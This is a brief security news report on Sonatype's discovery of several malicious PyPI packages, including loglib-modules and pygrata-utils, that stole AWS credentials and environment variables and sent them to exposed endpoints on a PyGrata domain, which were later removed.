Researchers have discovered several malicious packages in the official PyPI repository

image

Information security specialists from Sonatype have discovered several malicious packages in the official PyPI repository. They were designed to steal AWS credentials and environment variables, as well as send stolen information to an open endpoint.

The list of detected malicious packages looks like this:

  • loglib-modules – aimed at developers using the loglib library;

  • pyg-modules – aimed at developers using the pyg library;

  • pygrata – target unknown;

  • pygrata-utils – the target is unknown, but the package contains malicious code from ‘loglib-modules’;

  • hkg-sol-utils – target unknown.

Analysis of the ‘loglib-modules’ and ‘pygrata-utils’ packages revealed the presence of malicious code to steal AWS credentials and metadata and upload them to one or more endpoints hosted on the PyGrata domain. The stolen data was publicly available in the form of hundreds of TXT files.

“Our researchers noticed that the endpoints collecting credentials made them accessible to almost everyone,” the Sonatype report says.

Experts have yet to find out the identity of the attacker and his motivation.

After a message from specialists, all malicious PyPI packages and the endpoint were removed.

Earlier it was reported about a backdoor in other PyPI packages. A simple typo in the code could lead to data leakage and capture of thousands of users’ devices.

Start a discussion …